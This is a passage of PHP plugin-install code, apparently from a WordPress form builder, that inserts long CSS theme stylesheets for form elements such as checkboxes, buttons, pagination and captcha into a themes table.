font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/09/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8B8B8B;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #808080;\r\nbackground-color: #E5E5E5;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-left:3px;\r\nmargin-bottom:2px;\r\n}\r\n.page_active {\r\n	color: #C2C2C2;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #7F7F7F;\r\nmargin-left:3px;\r\nmargin-bottom: -1px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nborder-spacing: 0px;\r\nheight: 10px;\r\nbackground: #E7C85C;\r\nfloat: left;\r\n}\r\n.page_percentage_deactive {\r\nheight: 10px;\r\nline-height: 20px;\r\nbackground-color: #E5E5E5;\r\ntext-align: left !important;\r\nmargin-bottom: 2px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\ncolor: #fff;\r\nfont-size: 12px;\r\nposition: relative;\r\nbackground: url([SITE_ROOT]/images/09/02/02.png) no-repeat;\r\nwidth: 36px;\r\ndisplay: inline-block;\r\nheight: 36px;\r\ntop: -37px;\r\nleft: 17px;\r\ntext-align: center;\r\nline-height: 27px;\r\nfloat: right;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(35, \'Theme 10 orange\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F7D3BB;\r\nborder: 1px solid #FAAA63;\r\nmargin-bottom: 10px;\r\ncolor: #FAAA63;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/01/01/next_hoverbg.png) url([SITE_ROOT]/images/01/01/previous_hover.png) url([SITE_ROOT]/images/01/01/next_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 7px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 26px;\r\n	line-height: 26px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 28px;\r\n	width: 32px;\r\n	background: url([SITE_ROOT]/images/01/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 1px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-page-and-images:after {\r\n	width: 100%;\r\n	content: "";\r\n	display: block;\r\n	height: 17px;\r\n	background: url([SITE_ROOT]/images/01/0.png) no-repeat center center;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -17px;\r\n	left: -50px;\r\n	padding-left: 100px;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 7px;\r\n	height: 27px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n//text-overflow: ellipsis;\r\n}\r\n.file-picker {\r\n	width: 38px;\r\n	height: 34px;\r\n	background: url([SITE_ROOT]/images/01/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #000;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/01/nextbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\n	border-style: solid;\r\n	padding: 0px 15px;\r\n	vertical-align: middle;\r\n	border-color: transparent;\r\n}\r\ndiv.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/01/01/next_hoverbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\n}\r\n.next-page div.wdform-page-button {\r\n	border-width: 0px 18px 0px 0px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	box-shadow: inset 51px 0px 8px -50px #636363;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/01/next_hover.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/01/next_hover.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/01/next_hover.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/01/next_hover.png) 0 36 0 0 stretch;\r\n}\r\n.next-page:before {\r\n	content: "";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	border-width: 0px 0px 0px 18px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	box-shadow: inset -51px 0px 8px -50px #636363;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/01/previous_hover.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/01/previous_hover.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/01/previous_hover.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/01/previous_hover.png) 0 0 0 36 stretch;\r\n}\r\n.previous-page:after {\r\n	content: "";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow1.png) no-repeat right center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: -7px;\r\n}\r\n.button-submit {\r\n	background: #f58b33; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #f58b33 0%, #faaa63 20%, #faaa63 80%, #f58b33 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #f58b33), color-stop(20%, #faaa63), color-stop(80%, #faaa63), color-stop(100%, #f58b33)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #f58b33 0%, #faaa63 20%, #faaa63 80%, #f58b33 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #f58b33 0%, #faaa63 20%, #faaa63 80%, #f58b33 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #f58b33 0%, #faaa63 20%, #faaa63 80%, #f58b33 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #f58b33 0%, #faaa63 20%, #faaa63 80%, #f58b33 100%); /* W3C */\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #8D5D35;\r\n	border: 1px solid #F0C579;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 1px 1px #EC8E37;\r\n	font-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 1px solid #c9c9c9;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #F7D3BB;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n	border-top: 2px solid #FFB471;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break2 {\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #e8a467; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #e8a467 1%, #ffb471 20%, #ffb471 80%, #ffcd72 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(1%, #e8a467), color-stop(20%, #ffb471), color-stop(80%, #ffb471), color-stop(100%, #ffcd72)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #e8a467 1%, #ffb471 20%, #ffb471 80%, #ffcd72 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #e8a467 1%, #ffb471 20%, #ffb471 80%, #ffcd72 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #e8a467 1%, #ffb471 20%, #ffb471 80%, #ffcd72 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #e8a467 1%, #ffb471 20%, #ffb471 80%, #ffcd72 100%); /* W3C */\r\n	text-align: left;\r\n	padding: 7px 30px 10px 10px;\r\n	border-top-left-radius: 0px;\r\n	border-top-right-radius: 10px;\r\n	border-bottom-right-radius: 10px;\r\n	border-bottom-left-radius: 0px;\r\n	-moz-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\nfont-size:18px;\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 10px 16px 0px;\r\nfont-size:18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 7px;\r\n	height: 32px;\r\n	overflow: hidden;\r\n	border: 1px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 70px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/01/checkbox.png);\r\n	border-radius: 2px;\r\n	top: 0px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/01/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 37px;\r\n	height: 30px;\r\n	position: relative;\r\n	left: -35px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n	outline:none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 10px;\r\n	background: #615F60;\r\n	border-radius: 2px;\r\n	top: 3px;\r\n	left: 3px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	border-top: 1px solid #D8D6D7;\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 7px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 